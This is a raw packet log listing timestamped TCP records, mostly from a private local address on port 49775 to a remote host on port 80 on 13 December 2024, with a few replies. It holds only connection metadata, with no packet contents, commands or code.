Dec 13, 2024 01:37:36.045669079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045701027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045747042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045778990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045800924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045819998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045850039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045871973 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045896053 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045918941 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045939922 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045969009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045995951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046026945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046055079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046073914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046103954 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046143055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046143055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046188116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046188116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046235085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046235085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046279907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046312094 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046361923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046391964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046454906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046545982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046545982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046574116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046613932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046643972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046679020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046679020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046709061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046740055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046802044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046802044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046843052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046873093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046873093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046899080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046922922 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046956062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046956062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.046983004 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047013998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047013998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047045946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047045946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047080994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047081947 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047110081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047159910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047159910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047198057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047198057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047238111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047238111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047274113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047274113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047311068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047311068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047364950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047364950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047364950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047403097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047403097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047420025 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047434092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047460079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047482014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047504902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047523022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047542095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047563076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047581911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047600031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047620058 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047677040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047696114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047717094 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047739029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047758102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047780991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047837019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047897100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047913074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047949076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.047980070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048017979 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048037052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048059940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048079014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048214912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048214912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048233986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048250914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048307896 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048345089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048376083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048408985 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048434973 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048454046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048497915 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048561096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048605919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048648119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048666000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048687935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048706055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048732996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048757076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048782110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048809052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048829079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048861027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048880100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048903942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048921108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048949957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.048971891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049000978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049024105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049053907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049083948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049128056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049247026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049247026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049276114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049297094 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049331903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049355030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049374104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049395084 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049412012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049438953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049464941 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049478054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049504995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049524069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049554110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049588919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049621105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049635887 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049693108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049730062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049747944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049776077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049791098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049813032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049838066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049863100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049875975 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.049901962 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050034046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050034046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050034046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050050974 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050091982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050091982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050132990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050148010 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050235033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050235033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050235033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050235033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050257921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050265074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050292969 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050343037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050358057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050384998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050399065 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050451994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050467014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050496101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050510883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050539017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050558090 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050575972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050601006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050623894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050657034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050683975 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050714016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050733089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050759077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050779104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050803900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050826073 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050839901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050865889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050896883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050923109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050937891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050966024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.050993919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051058054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051058054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051091909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051132917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051194906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051194906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051227093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051242113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051265955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051280022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051301956 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051330090 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051331043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051383018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051383018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051399946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051409960 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051434040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051445961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051469088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051484108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051507950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051522017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051547050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051562071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051755905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051785946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051817894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051857948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051872015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051898956 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051914930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051961899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051961899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.051985979 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052002907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052037954 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.052078009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052093983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052143097 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.052151918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052185059 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.052208900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052223921 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.052232981 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.052234888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052294016 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.052295923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052340031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052345037 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.052354097 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.052365065 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052376986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052397013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052419901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052432060 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.052437067 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052459955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052470922 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.052484989 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.052529097 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.052565098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052604914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052668095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052683115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052758932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052758932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052777052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052798986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052824020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052853107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052866936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052906990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052922010 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.052989006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053033113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053051949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053075075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053093910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053122044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053139925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053162098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053174973 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053199053 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053214073 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053231001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053245068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053268909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053282976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053308964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053348064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053348064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053364038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053389072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053402901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053426981 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053441048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053461075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053479910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053505898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053519964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053541899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053555965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053585052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053600073 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053648949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053648949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053666115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053684950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053695917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053759098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053824902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053863049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.053881884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054092884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054116011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054141045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054260015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054260015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054260015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054280043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054299116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054322958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054339886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054363966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054383039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054402113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054492950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054517031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054531097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054593086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054676056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054691076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054760933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054852009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054873943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054908037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054933071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054948092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.054975033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055005074 CET	49775	80	192.168.2.5	185.81.68.147
